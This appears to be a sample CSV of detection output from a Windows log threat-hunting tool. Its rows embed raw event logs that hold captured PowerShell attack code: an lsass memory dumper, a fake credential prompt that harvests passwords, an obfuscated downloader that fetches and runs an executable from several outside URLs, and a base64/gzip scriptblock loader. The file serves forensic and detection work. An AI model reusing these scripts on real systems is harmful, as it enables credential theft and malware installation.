apt-hunter/source/samples/Sample_TimeSketch.csv


message,timestamp,datetime,timestamp_desc,Detection Domain,Severity,Event Description,Event ID,Original Event Log,Computer Name,Channel
powershell script block - Found Suspicious PowerShell commands ,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Critical,"Found Suspicious PowerShell commands that include (System.Management,.invoke,New-Object,New-Object,Remove-Item,del,-ErrorAction , -ErrorAction SilentlyContinue,get-process,Get-Process ,Get-Process,Get-Process lsass,invoke,IO.FileStream,join,MiniDumpWriteDump,Move-Item,new-object,Remove-Item,SilentlyContinue) , check event details ",4104,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-PowerShell"" Guid=""A0C1853B-5C40-4B15-8766-3CF1C58F985A"">
</Provider>
<EventID>4104</EventID>
<Version>1</Version>
<Level>3</Level>
<Task>2</Task>
<Opcode>15</Opcode>
<Keywords>0x0</Keywords>
<TimeCreated SystemTime=""2020-06-30T14:24:08.254605Z"">
</TimeCreated>
<EventRecordID>971</EventRecordID>
<Correlation ActivityID=""4AA5EAE3-4F33-0001-3A2B-A64A334FD601"">
</Correlation>
<Execution ProcessID=""7008"" ThreadID=""6488"">
</Execution>
<Channel>Microsoft-Windows-PowerShell/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-21-3461203602-4096304019-2269080069-1000"">
</Security>
</System>
<EventData>
<Data Name=""MessageNumber"">1</Data>
<Data Name=""MessageTotal"">1</Data>
<Data Name=""ScriptBlockText"">function Memory($path)
{
$Process = Get-Process lsass
$DumpFilePath = $path
$WER = [PSObject].Assembly.GetType(&apos;System.Management.Automation.WindowsErrorReporting&apos;)
$WERNativeMethods = $WER.GetNestedType(&apos;NativeMethods&apos;, &apos;NonPublic&apos;)
$Flags = [Reflection.BindingFlags] &apos;NonPublic, Static&apos;
$MiniDumpWriteDump = $WERNativeMethods.GetMethod(&apos;MiniDumpWriteDump&apos;, $Flags)
$MiniDumpWithFullMemory = [UInt32] 2
#
$ProcessId = $Process.Id
$ProcessName = $Process.Name
$ProcessHandle = $Process.Handle
$ProcessFileName = &quot;$($ProcessName).dmp&quot;
$ProcessDumpPath = Join-Path $DumpFilePath $ProcessFileName
$FileStream = New-Object IO.FileStream($ProcessDumpPath, [IO.FileMode]::Create)
$Result = $MiniDumpWriteDump.Invoke($null, @($ProcessHandle,
$ProcessId,
$FileStream.SafeFileHandle,
$MiniDumpWithFullMemory,
[IntPtr]::Zero,
[IntPtr]::Zero,
[IntPtr]::Zero))
$FileStream.Close()
if (-not $Result)
{
$Exception = New-Object ComponentModel.Win32Exception
$ExceptionMessage = &quot;$($Exception.Message) ($($ProcessName):$($ProcessId))&quot;
# Remove any partially written dump files. For example, a partial dump will be written
# in the case when 32-bit PowerShell tries to dump a 64-bit process.
Remove-Item $ProcessDumpPath -ErrorAction SilentlyContinue
throw $ExceptionMessage
}
else
{
&quot;Memdump complete!&quot;
}
}</Data>
<Data Name=""ScriptBlockId"">27f08bda-c330-419f-b83b-eb5c0f699930</Data>
<Data Name=""Path"">C:\Users\Public\lsass_wer_ps.ps1</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-PowerShell/Operational
powershell script block - Found Suspicious PowerShell commands ,1568036117.258414,2019-09-09T17:35:17.258414+04:00,,Threat,Critical,"Found Suspicious PowerShell commands that include (Password,New-Object,New-Object,$env:UserName,add,invoke,new-object,.pass,PromptForCredential,select-object,System.DirectoryServices.AccountManagement) , check event details ",4104,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-PowerShell"" Guid=""A0C1853B-5C40-4B15-8766-3CF1C58F985A"">
</Provider>
<EventID>4104</EventID>
<Version>1</Version>
<Level>3</Level>
<Task>2</Task>
<Opcode>15</Opcode>
<Keywords>0x0</Keywords>
<TimeCreated SystemTime=""2019-09-09T13:35:09.315230Z"">
</TimeCreated>
<EventRecordID>1123</EventRecordID>
<Correlation ActivityID=""B5ABE6C2-675C-0001-A601-ACB55C67D501"">
</Correlation>
<Execution ProcessID=""5500"" ThreadID=""356"">
</Execution>
<Channel>Microsoft-Windows-PowerShell/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-21-3461203602-4096304019-2269080069-1000"">
</Security>
</System>
<EventData>
<Data Name=""MessageNumber"">1</Data>
<Data Name=""MessageTotal"">1</Data>
<Data Name=""ScriptBlockText"">function Invoke-LoginPrompt{
$cred = $Host.ui.PromptForCredential(&quot;Windows Security&quot;, &quot;Please enter user credentials&quot;, &quot;$env:userdomain\$env:username&quot;,&quot;&quot;)
$username = &quot;$env:username&quot;
$domain = &quot;$env:userdomain&quot;
$full = &quot;$domain&quot; + &quot;\&quot; + &quot;$username&quot;
$password = $cred.GetNetworkCredential().password
Add-Type -assemblyname System.DirectoryServices.AccountManagement
$DS = New-Object System.DirectoryServices.AccountManagement.PrincipalContext([System.DirectoryServices.AccountManagement.ContextType]::Machine)
while($DS.ValidateCredentials(&quot;$full&quot;,&quot;$password&quot;) -ne $True){
$cred = $Host.ui.PromptForCredential(&quot;Windows Security&quot;, &quot;Invalid Credentials, Please try again&quot;, &quot;$env:userdomain\$env:username&quot;,&quot;&quot;)
$username = &quot;$env:username&quot;
$domain = &quot;$env:userdomain&quot;
$full = &quot;$domain&quot; + &quot;\&quot; + &quot;$username&quot;
$password = $cred.GetNetworkCredential().password
Add-Type -assemblyname System.DirectoryServices.AccountManagement
$DS = New-Object System.DirectoryServices.AccountManagement.PrincipalContext([System.DirectoryServices.AccountManagement.ContextType]::Machine)
$DS.ValidateCredentials(&quot;$full&quot;, &quot;$password&quot;) | out-null
}
$output = $newcred = $cred.GetNetworkCredential() | select-object UserName, Domain, Password
$output
R{START_PROCESS}
}
Invoke-LoginPrompt</Data>
<Data Name=""ScriptBlockId"">c7ca7056-b317-4fff-b796-05d8ef896dcd</Data>
<Data Name=""Path""></Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-PowerShell/Operational
powershell script block - Found Suspicious PowerShell commands ,1598418568.845521,2020-08-26T09:09:28.845521+04:00,,Threat,Critical,"Found Suspicious PowerShell commands that include (Net.WebClient,Net.WebClient,Net.WebClient,Net.WebClient,$env:TEMP\,char,-f , -Force,foreach,$Env:Temp\,Net.WebClient) , check event details ",4104,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-PowerShell"" Guid=""A0C1853B-5C40-4B15-8766-3CF1C58F985A"">
</Provider>
<EventID>4104</EventID>
<Version>1</Version>
<Level>5</Level>
<Task>2</Task>
<Opcode>15</Opcode>
<Keywords>0x0</Keywords>
<TimeCreated SystemTime=""2020-08-26T05:09:28.845521Z"">
</TimeCreated>
<EventRecordID>683</EventRecordID>
<Correlation ActivityID=""CCAD9034-7B61-0001-83CF-ADCC617BD601"">
</Correlation>
<Execution ProcessID=""6620"" ThreadID=""6340"">
</Execution>
<Channel>Microsoft-Windows-PowerShell/Operational</Channel>
<Computer>DESKTOP-RIPCLIP</Computer>
<Security UserID=""S-1-5-21-2895499743-3664716236-3399808827-1001"">
</Security>
</System>
<EventData>
<Data Name=""MessageNumber"">1</Data>
<Data Name=""MessageTotal"">1</Data>
<Data Name=""ScriptBlockText"">$Va5w3n8=((&apos;Q&apos;+&apos;2h&apos;)+(&apos;w9p&apos;+&apos;1&apos;));&amp;(&apos;ne&apos;+&apos;w-&apos;+&apos;item&apos;) $eNV:teMP\WOrd\2019\ -itemtype DIrectOry;[Net.ServicePointManager]::&quot;SecURi`T`ypRO`T`oCOL&quot; = (&apos;t&apos;+&apos;ls&apos;+&apos;1&apos;+(&apos;2, tl&apos;+&apos;s&apos;)+&apos;11&apos;+(&apos;, &apos;+&apos;tls&apos;));$Depssu0 = ((&apos;D&apos;+&apos;yx&apos;)+(&apos;x&apos;+&apos;ur4g&apos;)+&apos;x&apos;);$A74_j9r=(&apos;T&apos;+&apos;4&apos;+(&apos;gf45&apos;+&apos;h&apos;));$Fdkhtf_=$env:temp+((&apos;{0}&apos;+&apos;word{&apos;+&apos;0}&apos;+(&apos;2&apos;+&apos;01&apos;)+&apos;9{0}&apos;) -F [CHAr]92)+$Depssu0+(&apos;.&apos;+(&apos;ex&apos;+&apos;e&apos;));$O39nj1p=(&apos;J6&apos;+&apos;9l&apos;+(&apos;hm&apos;+&apos;h&apos;));$Z8i525z=&amp;(&apos;new-&apos;+&apos;obje&apos;+&apos;c&apos;+&apos;t&apos;) neT.WEbcLiENt;$Iwmfahs=((&apos;h&apos;+&apos;ttp&apos;)+(&apos;:&apos;+&apos;//&apos;)+(&apos;q&apos;+&apos;u&apos;+&apos;anticaelectro&apos;+&apos;n&apos;+&apos;ic&apos;)+(&apos;s.com&apos;+&apos;/&apos;)+&apos;w&apos;+&apos;p-&apos;+&apos;a&apos;+(&apos;d&apos;+&apos;min&apos;)+&apos;/&apos;+&apos;7A&apos;+(&apos;Tr78&apos;+&apos;/*&apos;+&apos;htt&apos;)+(&apos;p&apos;+&apos;s:/&apos;)+(&apos;/r&apos;+&apos;e&apos;)+&apos;be&apos;+(&apos;l&apos;+&apos;co&apos;)+&apos;m&apos;+&apos;.&apos;+(&apos;ch/&apos;+&apos;pi&apos;+&apos;c&apos;)+(&apos;ture&apos;+&apos;_&apos;)+(&apos;l&apos;+&apos;ibra&apos;+&apos;ry/bbCt&apos;)+(&apos;l&apos;+&apos;S/&apos;)+(&apos;*ht&apos;+&apos;tp&apos;+&apos;s:/&apos;)+(&apos;/re&apos;+&apos;al&apos;)+&apos;e&apos;+&apos;s&apos;+(&apos;tate&apos;+&apos;a&apos;)+(&apos;gen&apos;+&apos;t&apos;)+&apos;te&apos;+(&apos;am.co&apos;+&apos;m&apos;)+&apos;/&apos;+(&apos;163/Q&apos;+&apos;T&apos;)+&apos;d&apos;+(&apos;/&apos;+&apos;*ht&apos;+&apos;tps:&apos;)+&apos;//&apos;+(&apos;w&apos;+&apos;ww.&apos;)+(&apos;ri&apos;+&apos;dd&apos;)+(&apos;hi&apos;+&apos;display.&apos
;+&apos;c&apos;+&apos;o&apos;)+&apos;m/&apos;+&apos;r&apos;+&apos;id&apos;+&apos;d&apos;+(&apos;hi&apos;+&apos;/1pKY/&apos;+&apos;*htt&apos;)+&apos;p&apos;+(&apos;:&apos;+&apos;//&apos;)+(&apos;radi&apos;+&apos;osu&apos;+&apos;bmit.com/&apos;+&apos;sear&apos;)+(&apos;ch_&apos;+&apos;tes&apos;+&apos;t&apos;)+&apos;/&apos;+&apos;p&apos;+(&apos;/*&apos;+&apos;h&apos;)+(&apos;ttp&apos;+&apos;:/&apos;)+&apos;/&apos;+(&apos;res&apos;+&apos;e&apos;)+&apos;ar&apos;+(&apos;ch&apos;+&apos;c&apos;)+&apos;he&apos;+&apos;m&apos;+(&apos;plu&apos;+&apos;s.&apos;+&apos;c&apos;)+(&apos;om/w&apos;+&apos;p-&apos;)+(&apos;a&apos;+&apos;dmin&apos;)+&apos;/1&apos;+(&apos;OC&apos;+&apos;C&apos;)+&apos;/&apos;+(&apos;*http:&apos;+&apos;/&apos;)+(&apos;/s&apos;+&apos;zymo&apos;)+(&apos;ns&apos;+&apos;zyp&apos;)+&apos;er&apos;+(&apos;sk&apos;+&apos;i&apos;)+(&apos;.&apos;+&apos;pl/a&apos;)+&apos;ss&apos;+(&apos;ets/&apos;+&apos;p&apos;)+&apos;k/&apos;).&quot;S`Plit&quot;([char]42);$Zxnbryr=((&apos;Dp&apos;+&apos;z9&apos;)+&apos;4&apos;+&apos;a6&apos;);foreach($Mqku5a2 in $Iwmfahs){try{$Z8i525z.&quot;d`OWN`load`FIlE&quot;($Mqku5a2, $Fdkhtf_);$Lt8bjj7=(&apos;Ln&apos;+(&apos;wp&apos;+&apos;ag&apos;)+&apos;m&apos;);If ((.(&apos;Get-I&apos;+&apos;t&apos;+&apos;em&apos;) $Fdkhtf_).&quot;le`NgTH&quot; -ge 28315) {cp (gcm calc).path $Fdkhtf_ -Force; .(&apos;Invo&apos;+&apos;ke&apos;+&apos;-Item&apos;)($Fdkhtf_);$Nfgrgu9=((&apos;Qj6&apos;+&apos;bs&apos;)+&apos;x&apos;+&apos;n&apos;);break;$D7ypgo1=(&apos;Bv&apos;+(&apos;e&apos;+&apos;bc&apos;)+&apos;k0&apos;)}}catch{}}$Gmk6zmk=((&apos;Z2x&apos;+&apos;aaj&apos;)+&apos;0&apos;)</Data>
<Data Name=""ScriptBlockId"">fdd51159-9602-40cb-839d-c31039ebbc3a</Data>
<Data Name=""Path""></Data>
</EventData>
</Event>",DESKTOP-RIPCLIP,Microsoft-Windows-PowerShell/Operational
powershell script block - Found Suspicious PowerShell commands ,1568036109.31523,2019-09-09T17:35:09.315230+04:00,,Threat,Critical,"Found Suspicious PowerShell commands that include (FromBase64String,Base64,New-Object,New-Object,new-object,readtoend,system.io.streamreader) , check event details ",4104,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-PowerShell"" Guid=""A0C1853B-5C40-4B15-8766-3CF1C58F985A"">
</Provider>
<EventID>4104</EventID>
<Version>1</Version>
<Level>3</Level>
<Task>2</Task>
<Opcode>15</Opcode>
<Keywords>0x0</Keywords>
<TimeCreated SystemTime=""2019-09-09T13:35:08.655802Z"">
</TimeCreated>
<EventRecordID>1122</EventRecordID>
<Correlation ActivityID=""B5ABE6C2-675C-0000-AAFD-ABB55C67D501"">
</Correlation>
<Execution ProcessID=""5500"" ThreadID=""356"">
</Execution>
<Channel>Microsoft-Windows-PowerShell/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-21-3461203602-4096304019-2269080069-1000"">
</Security>
</System>
<EventData>
<Data Name=""MessageNumber"">1</Data>
<Data Name=""MessageTotal"">1</Data>
<Data Name=""ScriptBlockText"">&amp;([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String(&apos;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&apos;))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))</Data>
<Data Name=""ScriptBlockId"">37f6d110-cfdf-4118-8748-17638e258531</Data>
<Data Name=""Path""></Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-PowerShell/Operational
[T1059] Command-Line Interface,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Low,Found User (LAPTOP-JU4M3I0E\bouss) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-10-05T20:43:58.451314Z"">
</TimeCreated>
<EventRecordID>2164892</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""5424"" ThreadID=""6708"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>LAPTOP-JU4M3I0E</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-10-05 20:43:58.450</Data>
<Data Name=""ProcessGuid"">00247C92-858E-5F7B-0000-0010E741202B</Data>
<Data Name=""ProcessId"">6636</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.18362.449 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">Cmd.Exe</Data>
<Data Name=""CommandLine"">cmd.exe</Data>
<Data Name=""CurrentDirectory"">C:\windows\</Data>
<Data Name=""User"">LAPTOP-JU4M3I0E\bouss</Data>
<Data Name=""LogonGuid"">00247C92-8C36-5F75-0000-002034E39103</Data>
<Data Name=""LogonId"">0x391e334</Data>
<Data Name=""TerminalSessionId"">2</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8DCA9749CD48D286950E7A9FA1088C937CBCCAD4,MD5=D7AB69FAD18D4A643D84A271DFC0DBDF,SHA256=FF79D3C4A0B7EB191783C323AB8363EBD1FD10BE58D8BCC96B07067743CA81D5,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">00247C92-858E-5F7B-0000-00105241202B</Data>
<Data Name=""ParentProcessId"">18404</Data>
<Data Name=""ParentImage"">C:\Windows\System32\Taskmgr.exe</Data>
<Data Name=""ParentCommandLine"">C:\windows\system32\taskmgr.exe</Data>
</EventData>
</Event>",LAPTOP-JU4M3I0E,Microsoft-Windows-Sysmon/Operational
Prohibited Process connecting to internet,1556808617.955524,2019-05-02T18:50:17.955524+04:00,,Threat,Critical,"User (IEWIN7\IEUser) run process C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe and initiated network connection from hostname ( IEWIN7.home and IP ( 10.0.2.15 ) to hostname ( ) , IP ( 151.101.36.133 ) and port ( 443 )",3,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>3</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>3</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-02T14:48:53.950750Z"">
</TimeCreated>
<EventRecordID>10272</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1960"" ThreadID=""132"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-02 14:48:51.664</Data>
<Data Name=""ProcessGuid"">365ABB72-0244-5CCB-0000-00109AE70B00</Data>
<Data Name=""ProcessId"">1508</Data>
<Data Name=""Image"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""Protocol"">tcp</Data>
<Data Name=""Initiated"">true</Data>
<Data Name=""SourceIsIpv6"">false</Data>
<Data Name=""SourceIp"">10.0.2.15</Data>
<Data Name=""SourceHostname"">IEWIN7.home</Data>
<Data Name=""SourcePort"">49178</Data>
<Data Name=""SourcePortName""></Data>
<Data Name=""DestinationIsIpv6"">false</Data>
<Data Name=""DestinationIp"">151.101.36.133</Data>
<Data Name=""DestinationHostname""></Data>
<Data Name=""DestinationPort"">443</Data>
<Data Name=""DestinationPortName"">https</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1082] System Information Discovery,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Critical,System Information Discovery Process ( C:\Windows\System32\whoami.exe) with commandline ( whoami) ,1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-08-02T16:24:28.640990Z"">
</TimeCreated>
<EventRecordID>339891</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3200"" ThreadID=""3032"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-08-02 16:24:28.637</Data>
<Data Name=""ProcessGuid"">747F3D96-E8BC-5F26-0000-0010F7C41A00</Data>
<Data Name=""ProcessId"">588</Data>
<Data Name=""Image"">C:\Windows\System32\whoami.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">whoami - displays logged on user information</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">whoami.exe</Data>
<Data Name=""CommandLine"">whoami</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">747F3D96-E308-5F26-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=47D7864D26FC67E0D60391CBF170D33DA518C322,MD5=43C2D3293AD939241DF61B3630A9D3B6,SHA256=1D5491E3C468EE4B4EF6EDFF4BBC7D06EE83180F6F0B1576763EA2EFE049493A,IMPHASH=7FF0758B766F747CE57DFAC70743FB88</Data>
<Data Name=""ParentProcessGuid"">747F3D96-E8BA-5F26-0000-001035BE1A00</Data>
<Data Name=""ParentProcessId"">8104</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;c:\windows\system32\cmd.exe&quot;</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1053] Scheduled Task - Process,1619129375.284604,2021-04-23T02:09:35.284604+04:00,,Threat,Low,Found User (NT AUTHORITY\LOCAL SERVICE) running image ( C:\Windows\System32\svchost.exe ) through command line ( C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2021-04-22T22:09:35.284225Z"">
</TimeCreated>
<EventRecordID>564605</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3352"" ThreadID=""4696"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2021-04-22 22:09:35.263</Data>
<Data Name=""ProcessGuid"">747F3D96-F41F-6081-0000-001078834A00</Data>
<Data Name=""ProcessId"">6644</Data>
<Data Name=""Image"">C:\Windows\System32\svchost.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Host Process for Windows Services</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">svchost.exe</Data>
<Data Name=""CommandLine"">C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\LOCAL SERVICE</Data>
<Data Name=""LogonGuid"">747F3D96-6E1A-6082-0000-0020E5030000</Data>
<Data Name=""LogonId"">0x3e5</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=A1385CE20AD79F55DF235EFFD9780C31442AA234,MD5=8A0A29438052FAED8A2532DA50455756,SHA256=7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6,IMPHASH=247B9220E5D9B720A82B2C8B5069AD69</Data>
<Data Name=""ParentProcessGuid"">00000000-0000-0000-0000-000000000000</Data>
<Data Name=""ParentProcessId"">624</Data>
<Data Name=""ParentImage"">?</Data>
<Data Name=""ParentCommandLine"">?</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1596385468.64099,2020-08-02T20:24:28.640990+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;c:\windows\system32\cmd.exe&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-08-02T16:24:26.809904Z"">
</TimeCreated>
<EventRecordID>339890</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3200"" ThreadID=""3032"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-08-02 16:24:26.803</Data>
<Data Name=""ProcessGuid"">747F3D96-E8BA-5F26-0000-001035BE1A00</Data>
<Data Name=""ProcessId"">8104</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.592 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">Cmd.Exe</Data>
<Data Name=""CommandLine"">&quot;c:\windows\system32\cmd.exe&quot;</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">747F3D96-E308-5F26-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-E309-5F26-0000-0010137B0000</Data>
<Data Name=""ParentProcessId"">820</Data>
<Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k DcomLaunch -p</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[ T1003 ] Credential Dumping ImageLoad,1555606895.720774,2019-04-18T21:01:35.720774+04:00,,Threat,Medium,[ T1003 ] Credential Dumping ImageLoad,7,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>7</EventID>
<Version>3</Version>
<Level>4</Level>
<Task>7</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-04-18T17:01:35.680716Z"">
</TimeCreated>
<EventRecordID>29</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3192"" ThreadID=""3288"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName"">technique_id=T1003,technique_name=Credential Dumping</Data>
<Data Name=""UtcTime"">2019-04-18 17:01:35.680</Data>
<Data Name=""ProcessGuid"">365ABB72-AC28-5CB8-0000-0010F3F70700</Data>
<Data Name=""ProcessId"">1200</Data>
<Data Name=""Image"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ImageLoaded"">C:\Windows\System32\vaultcli.dll</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Credential Vault Client Library</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""Hashes"">SHA1=9A398500E906FA979C21CD9F19C929FE798AF9EF,MD5=36B8D5903CEEF0AA42A1EE002BD27FF1,SHA256=CBD5C4D0E05B9A2657D816B655FFFC386807061594DEAABA754658D3152F7403,IMPHASH=55954B415EBB6BF5B592831A5E07DC56</Data>
<Data Name=""Signed"">true</Data>
<Data Name=""Signature"">Microsoft Windows</Data>
<Data Name=""SignatureStatus"">Valid</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
